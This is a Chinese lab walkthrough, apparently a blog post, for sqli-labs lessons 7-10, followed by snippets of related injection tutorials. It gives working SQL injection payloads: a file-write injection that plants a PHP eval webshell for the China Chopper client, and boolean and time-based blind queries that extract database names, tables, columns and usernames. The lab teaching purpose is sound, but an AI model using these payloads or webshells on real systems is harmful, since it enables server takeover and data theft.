sqli-labs lesson 7-10 (文件导出,布尔盲注,延时注入)

写在前面:

  首先需要更改一下数据库用户的权限用于我们之后的操作。

  首先在mysql命令行中用show variables like ‘%secure%‘;查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开 C:\phpstudy\PHPTutorial\MySQL\my.ini文件,在其中加上一句:secure_file_priv=“/”。

  

  

  

  重启phpstudy 权限就改过来了

  1.load_file(file_name)导出文件函数:

   Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。

   但是这里必须有权限读取并且文件必须完全可读,否则函数返回false。(这也是上面修改权限的原因)

  2.select ....... into outfile ‘file_name‘ :

  可以把被选择的行写入一个文件中。同样的必须要有文件的读写权限才可以执行此语句。

  比如:select version() into outfile "c:\\phpstudy\\111.txt" 这里\\和windows中/含义类似。这语句执行成功后就把数据库版本写入了111.txt文件中。

  而我们进行注入的时候会把selec后的内容换成一句话木马:<?php @eval($_post["mima"])?> 配合中国菜刀这个软件使用。

  ps:这里select后的内容不仅仅局限于上传一句话木马,也可以上传很多其他内容。

 3.一句话木马:

  <?php @eval($_POST[“crow”]);?> 这是php版本的,其中crow是密码。

  一句话木马大都是配合中国菜刀使用

  进入正题:

  先看源码 发现id被‘))包裹 ,原理和之前类似 构造语句就OK   

  执行语句:

?id=1‘)) union select 1,2,‘<?php @eval($_POST["mm"]);?>‘ into outfile "C:\\phpStudy\\WWW\\sqli-labs-master\\Less-7\\111.php" %23
  

  这里需要注意几个点,首先php文件是通过into outfile语句生成的,不要在同目录下出现同名的php文件

  关于一句话木马:‘<?php @eval($_POST["mm"]);?>‘  注意?php与@eval之间有空格,很多菜刀连接有问题基本是因为一句话出毛病了。

  虽然出现报错,但是111.php文件已经出现导入内容了。

  

  之后连接中国菜刀,右键空白处选择添加,进入下面页面

  shell路径注意要如下图格式,而不是本地的绝对路径,后面的mm是我对应的密码,也就是一句话中中括号括起来的那两个字母。

  

  连接成功后如下:

  

  

less-8:  

   1.布尔盲注:

   id还是用‘包裹,闭合单引号构造语句就好。

   之前用到过 比如 left(),ascii()+substr()进行猜解,这里不再赘述。

   下面主要介绍延时注入的方法。

   2.延时注入:通过if和sleep()函数组合根据页面反应时长(页面返回true会很快,返回flase会执行sleep())

   if(condition,a,b):如果condition返回ture执行a;否则执行b

   sleep(a):等待a秒后返回页面做出反应。

   比如:执行 ?id=1‘ and if(length(datatbase())=8,1,sleep(10)) %23

      当数据库长度为8时页面很快出现反应,不为8时会延时10秒返回页面反应。

      同理 执行?id=1‘ and if(ascii(substr(database(),1,1))>110,1,sleep(10)) %23

      与上面类似,比较费时,个人感觉逻辑上不如利用二分法布尔盲注快。

下面附上部分步骤:
数据库长度为8位

猜解数据库名
可以利用and left(database(),1)>‘a‘ 猜解第一位
             and left(database(),2)>‘sa‘ 猜解前2位 
             left(str,num) 截取str字符串前num位(从左往右)
2.判断表名

and ascii(substr((select table_name from infomation_schema.tables where tables_schema=database() limit 0,1),1,1))
判断列名1:ascii+substr
     and ascii(substr((select column_name from information_schema.columns where table_name=security.users limit 0,1),1,1))>97 %23

判断列名2:regexp
     and 1=(select 1 from information_schema.columns where table_name=‘users‘ and column_name regexp ‘^username‘ limit 0,1) %23

3.1利用ascii和substr破解列中的内容:

  ?id=1‘ and ascii(substr((select username from security.users limit 0,1),1,1))=68 %23

less 9-10:

  与上面不同,不管如何输入返回都是You are in ....

  所以只能使用延时注入。

  less 9 的id是被 ‘ 包裹

  less 10 是 "  包裹  注意闭合语句即可 方法就是上面所说的延时注入。

   

  

  

原文地址:https://www.cnblogs.com/Zh1z3ven/p/12421504.html

时间: 2024-10-15 06:09:46

sqli-labs lesson 7-10 (文件导出,布尔盲注,延时注入)的相关文章

布尔盲注(基于sqli-labs第八关)

布尔盲注(基于sqli-labs第八关) 对于盲注只有2种感觉,好玩,好烦. 新技能好玩,一个一个猜好烦.不知道你们是否跟我一样. 手工注入,一个个猜解.大多数人都会觉得特别烦躁的东西. 注入还设有第一点,看注入点在哪里. 个人的查看注入点的方式'单引号,“双引号, http://localhost/sqli/Less-8/?id=1 #正常 http://localhost/sqli/Less-8/?id=1' #不正常 http://localhost/sqli/Less-8/?id=1"

sqli labs注入记录(Less-1至Less-10)

Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数: http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1

基于布尔的盲注

盲注是注入的一种,指的是在不知道数据返回值的情况下对数据中的内容进行猜测,实施注入.盲注一般分为布尔盲注和基于时间的盲注 #coding:utf-8 2 import requests 3 4 # chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' 5 6 #得知库名长度是8:http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2

C#+OpenGL+FreeType显示3D文字(1) - 从TTF文件导出字形贴图

C#+OpenGL+FreeType显示3D文字(1) - 从TTF文件导出字形贴图 +BIT祝威+悄悄在此留下版了个权的信息说: 最近需要用OpenGL绘制文字,这是个很费时费力的事.一般的思路就是解析TTF文件从而得到字形的贴图,然后通过OpenGL绘制贴图的方式显示文字. 本篇记录了解析TTF文件并把所有字形安排到一张大贴图上的过程. 使用FreeType 想从零开始解析TTF文件是一个比较大的工程,所以目前就借助FreeType.FreeType是一个开源的跨平台的TTF文件解析器.当然

分页并分文件导出Excel接口Controller和Service

1 /*start---------------------------------------[导出Excel接口Controller--shiyanjun]-------------------------------------------------------------*/ 2 3 /** 4 * 功能描述:[导出Excel接口] 5 * 创建者:shiyanjun 6 * 创建时间:2014年11月25日10:00:18 周二 7 * @param columns 表头 8 * @

Lesson 024 —— python 文件操作

Lesson 024 -- python 文件操作 open() 方法 Python open() 方法用于打开一个文件,并返回文件对象,在对文件进行处理过程都需要使用到这个函数,如果该文件无法被打开,会抛出 OSError. 注意:使用 open() 方法一定要保证关闭文件对象,即调用 close() 方法. open() 函数常用形式是接收两个参数:文件名(file)和模式(mode). open(file, mode='r') 完整的语法格式为: open(file, mode='r',

一、【Spring Boot】 Excel文件导出下载

   Spring Boot Excel 文件导出 目标: 实现Excel文件的直接导出下载,后续开发不需要开发很多代码,直接继承已经写好的代码,增加一个Xml配置就可以直接导出. 实现: 1.抽象类 BaseExcelView 继承 webmvc 的 AbstractXlsxStreamingView 抽象类, AbstractXlsxStreamingView 是webmvc继承了最顶层View接口,是可以直接大量数据导出的不会造成内存泄漏问题,即 SXSSFWorkbook 解决了内存问题

Markdown文件导出为HTML的小程序

Markdown文件导出为HTML的小程序 为什么做 最近把一些学习经验记下来,总结成MarkDown文件,不知不觉已经有12篇了. Sublime Text 的 MarkDown Preview 插件能够将MarkDown语法转换为HTML,并提供三种预览方式:浏览器预览.保存为HTML文件.输出到Sublime的新标签页. 但有一个缺点是,我有12个MarkDown文件,想分别转换为HTML文件,需要重复执行12次打开文件->Crtl+P调出命令面板->输入MarkDown Preview

C# CS格式文件导出为Dll库

[1]使用的工具 VS开发人员命令提示.安装VS后,在开始菜单的VS工具的目录下可以看到该命令工具. [2]准备需要导出的CS文件 导出的Dll需要准备所有相互依赖的CS文件,如果存在多个就需要准备多个. [3]编写命令行导出Dll 模版是: csc /target:library /out: "目的Dll全路径" "源CS路径1" "源CS路径2" ... "源CS路径n" 如: csc /target:library /o